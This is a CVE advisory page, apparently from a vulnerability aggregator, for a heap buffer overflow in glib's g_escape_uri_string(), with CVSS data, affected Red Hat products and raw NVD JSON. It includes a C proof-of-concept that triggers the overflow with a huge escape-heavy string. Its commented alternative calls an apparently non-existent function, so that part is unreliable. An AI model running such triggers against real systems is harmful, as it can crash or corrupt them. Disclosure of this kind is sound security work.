Security Vulnerability Report
中文
CVE-2025-13601 CVSS 7.7 HIGH

CVE-2025-13601

Published: 2025-11-26 15:15:52
Last Modified: 2026-05-19 16:16:18
Source: [email protected]

Description

A heap-based buffer overflow problem was found in glib through an incorrect calculation of buffer size in the g_escape_uri_string() function. If the string to escape contains a very large number of unacceptable characters (which would need escaping), the calculation of the length of the escaped string could overflow, leading to a potential write off the end of the newly allocated string.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:redhat:codeready_linux_builder:9.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:9.0_s390x:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:9.0_ppc64le:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:9.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_arm64:10.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:10.0_s390x:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:10.0_ppc64le:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:10.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:10.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_arm64:8.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:8.0_s390x:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:8.0_ppc64le:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:8.0:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:9.2:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:9.2_s390x:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:9.2_ppc64le:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_x86_64:9.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_server_aus:9.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_arm64_eus:9.4:*:*:*:*:*:aarch64:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:9.4_s390x:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:9.4_ppc64le:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:9.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:9.4:*:*:*:*:*:aarch64:* - VULNERABLE
glib < 2.82.0
Red Hat Enterprise Linux 7.x
Red Hat Enterprise Linux 8.x
Red Hat Enterprise Linux 9.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * CVE-2025-13601 PoC - glib g_escape_uri_string() Heap Buffer Overflow * This PoC demonstrates the integer overflow in buffer size calculation. * * Build: gcc -o poc poc.c `pkg-config --cflags --libs glib-2.0` * Note: Requires glib version with vulnerable g_escape_uri_string() */ #include <glib.h> #include <stdio.h> #include <string.h> #define MALICIOUS_STRING_SIZE 0x80000000 /* Large number to trigger overflow */ int main(int argc, char *argv[]) { gchar *malicious_input; gchar *escaped_output; gsize input_length; /* Prepare malicious input with many characters requiring escaping */ input_length = MALICIOUS_STRING_SIZE; malicious_input = g_malloc(input_length); /* Fill with characters that need URI escaping (e.g., spaces, control chars) */ memset(malicious_input, ' ', input_length - 1); malicious_input[input_length - 1] = '\0'; printf("[*] Triggering CVE-2025-13601\n"); printf("[*] Input length: %zu\n", input_length); /* This call may trigger heap buffer overflow due to integer overflow */ escaped_output = g_escape_uri_string(malicious_input); if (escaped_output) { g_free(escaped_output); } g_free(malicious_input); printf("[+] Test completed\n"); return 0; } /* Alternative PoC using g_uri_escape_string() */ /* #include <gio/gio.h> void trigger_vulnerability() { gchar *long_string = g_str_repeat("\xff", 0x40000000); gchar *escaped = g_uri_escape_string(long_string, NULL, FALSE); // May cause buffer overflow due to size calculation overflow g_free(escaped); g_free(long_string); } */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13601", "sourceIdentifier": "[email protected]", "published": "2025-11-26T15:15:51.723", "lastModified": "2026-05-19T16:16:17.953", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A heap-based buffer overflow problem was found in glib through an incorrect calculation of buffer size in the g_escape_uri_string() function. If the string to escape contains a very large number of unacceptable characters (which would need escaping), the calculation of the length of the escaped string could overflow, leading to a potential write off the end of the newly allocated string."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder:9.0:*:*:*:*:*:aarch64:*", "matchCriteriaId": "7905C85D-4663-4485-99C1-202F4A7D6EBD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:9.0_s390x:*:*:*:*:*:*:*", "matchCriteriaId": "CA3C5EAE-267F-410F-8AFA-8F5B68A9E617"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:9.0_ppc64le:*:*:*:*:*:*:*", "matchCriteriaId": "7B3D7389-35C1-48C4-A9EC-2564842723C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "D70C7263-C24B-4090-9E44-0E0CFD2294A1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_arm_64:9.0:*:*:*:*:*:aarch64:*", "matchCriteriaId": "1810D5FB-1AB2-4861-A671-CA548C2FFDC3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:9.0_s390x:*:*:*:*:*:*:*", "matchCriteriaId": "FB056B47-1F45-4CE4-81F6-872F66C24C29"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:9.0_ppc64le:*:*:*:*:*:*:*", "matchCriteriaId": "E07C1C58-0E5F-4B56-9B8D-5DE67DB00F79"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_x86_64:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EE296A4-202C-41AF-92AB-AC0672EAFA90"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_arm64:10.0:*:*:*:*:*:aarch64:*", "matchCriteriaId": "EF8B4882-78F7-4DC5-BF80-983143DA0155"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:10.0_s390x:*:*:*:*:*:*:*", "matchCriteriaId": "FA2DB6C0-E18E-492A-B517-4020A7FB049A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:10.0_ppc64le:*:*:*:*:*:*:*", "matchCriteriaId": "6FAC9D08-6D5C-443D-99C7-6FD20AF83523"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D791EEA5-68D1-41E0-A53D-8EBB9C6CF873"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_arm_64:10.0:*:*:*:*:*:aarch64:*", "matchCriteriaId": "18873769-C951-42F2-A98B-761652148F59"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:10.0_s390x:*:*:*:*:*:*:*", "matchCriteriaId": "8492E227-C09E-4F51-8EAF-0F7BCCD41A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:10.0_ppc64le:*:*:*:*:*:*:*", "matchCriteriaId": "1FABD546-0E45-4A65-A2E5-50EC62B852E7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_x86_64:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "5C4D6060-0C13-4976-A366-C4655367AA78"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_arm64:8.0:*:*:*:*:*:aarch64:*", "matchCriteriaId": "C70933CB-B915-4792-902B-CC858829D208"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_ibm_z_systems:8.0_s390x:*:*:*:*:*:*:*", "matchCriteriaId": "55CF7208-4D36-4C35-92BC-F6EA2C8DEDE1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_power_little_endian:8.0_ppc64le:*:*:*:*:*:*:*", "matchCriteriaId": "F791F846-7762-40E0-9056-032FD10F2046"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:codeready_linux_builder_for_x86_64:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F967F2F2-9B99-46D3-A092-F7AE41F5D5B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_for_arm_6 ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.